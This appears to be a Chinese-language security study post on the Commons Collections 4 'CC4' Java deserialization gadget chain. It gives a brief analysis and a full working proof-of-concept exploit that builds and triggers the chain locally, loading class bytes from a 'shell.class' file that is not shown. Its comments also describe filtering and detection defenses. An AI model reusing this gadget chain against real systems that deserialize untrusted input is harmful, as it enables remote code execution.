环境准备

环境与 CC 链 2 相同。

分析

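个人认为，CC 链 4 就是 CC3 和 CC2 的结合：触发入口沿用 CC2 的 PriorityQueue + TransformingComparator，后半段沿用 CC3 的 InstantiateTransformer + TrAXFilter + TemplatesImpl。下面直接贴出 exp。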

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

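/**
 * Local proof of concept for the Commons Collections 4 "CC4" deserialization gadget chain.
 *
 * <p>{@link #main} builds an object graph, writes it to {@code ser.bin} and reads it straight
 * back, so the whole demonstration stays inside one JVM. The graph combines:
 * <ul>
 *   <li>a {@link PriorityQueue} whose comparator is a {@code TransformingComparator}; the queue
 *       re-orders its elements while it is being deserialized, which calls the comparator;</li>
 *   <li>a {@code ChainedTransformer} that yields {@code TrAXFilter.class} and then instantiates
 *       it through {@code InstantiateTransformer} with a {@link Templates} argument;</li>
 *   <li>a {@code TemplatesImpl} carrying class bytes, which are loaded once the
 *       {@code TrAXFilter} constructor asks the templates object for a transformer.</li>
 * </ul>
 *
 * <p>Defensive takeaways: the trigger is an unfiltered {@code ObjectInputStream.readObject()}
 * combined with these functor classes being serializable and on the classpath. Later Commons
 * Collections 4 releases no longer make the unsafe functors (including
 * {@code InstantiateTransformer}) serializable, and a deserialization filter
 * ({@code java.io.ObjectInputFilter} on Java 9+, or the {@code jdk.serialFilter} property) that
 * allow-lists expected classes rejects the stream before any of them is instantiated. For
 * detection, a serialized stream that names {@code TemplatesImpl}, {@code TrAXFilter} or a
 * {@code collections4.functors} class is a strong indicator.
 */
public class cc4 {

    /**
     * Builds the object graph, serializes it to {@code ser.bin} and deserializes it again.
     *
     * @param args unused
     * @throws Exception on any reflection, I/O or deserialization failure
     */
    // Raw Commons Collections types are kept on purpose: the chain mixes unrelated element
    // types (Integer queue entries, Class, TrAXFilter) that generics would reject.
    @SuppressWarnings({"rawtypes", "unchecked"})
    public static void main(String[] args) throws Exception {
        // TemplatesImpl offers no public setters for these fields, so they are set reflectively.
        TemplatesImpl templates = new TemplatesImpl();
        setField(templates, "_name", "cc4");

        // Class bytes come from a locally compiled file that is not shown on this page.
        byte[] classBytes = Files.readAllBytes(
                Paths.get("D:\\Desktop\\java\\javacc\\target\\classes\\shell.class"));
        setField(templates, "_bytecodes", new byte[][] {classBytes});
        setField(templates, "_tfactory", new TransformerFactoryImpl());

        // Step 1 ignores its input and returns TrAXFilter.class; step 2 calls the
        // TrAXFilter(Templates) constructor with the prepared templates object.
        Transformer[] steps = {
            new ConstantTransformer(TrAXFilter.class),
            new InstantiateTransformer(new Class[] {Templates.class}, new Object[] {templates})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(steps);
        TransformingComparator transformingComparator =
                new TransformingComparator(chainedTransformer);

        // Two elements are enough to make the queue compare something when it is rebuilt.
        PriorityQueue<Object> priorityQueue = new PriorityQueue<>(111);
        priorityQueue.add(1);
        priorityQueue.add(2);

        // The comparator is installed only after add(): add() would otherwise invoke it
        // while the graph is still being built instead of during deserialization.
        setField(priorityQueue, "comparator", transformingComparator);

        seriliaze(priorityQueue);
        unserilize("ser.bin");
    }

    /** Sets the field {@code name} declared on {@code target}'s own class, bypassing access checks. */
    private static void setField(Object target, String name, Object value) throws Exception {
        Field field = target.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(target, value);
    }

    /**
     * Serializes {@code o} to the file {@code ser.bin} in the working directory.
     *
     * @param o object graph to write
     * @throws Exception if the file cannot be written or {@code o} is not serializable
     */
    public static void seriliaze(Object o) throws Exception {
        // try-with-resources flushes and closes the file even when writeObject throws.
        try (ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            out.writeObject(o);
        }
    }

    /**
     * Deserializes and returns the first object stored in {@code filename}.
     *
     * <p>NOTE(review): {@code readObject()} runs with no deserialization filter. That is the
     * weakness this class demonstrates; code that reads data it did not produce itself should
     * install an allow-list filter ({@code ObjectInputStream.setObjectInputFilter} on Java 9+)
     * or avoid Java native serialization altogether.
     *
     * @param filename path of the serialized file
     * @return the deserialized object
     * @throws Exception if the file cannot be read or deserialization fails
     */
    public static Object unserilize(String filename) throws Exception {
        // The stream is closed even when a gadget throws part-way through readObject().
        try (ObjectInputStream in = new ObjectInputStream(new FileInputStream(filename))) {
            return in.readObject();
        }
    }
}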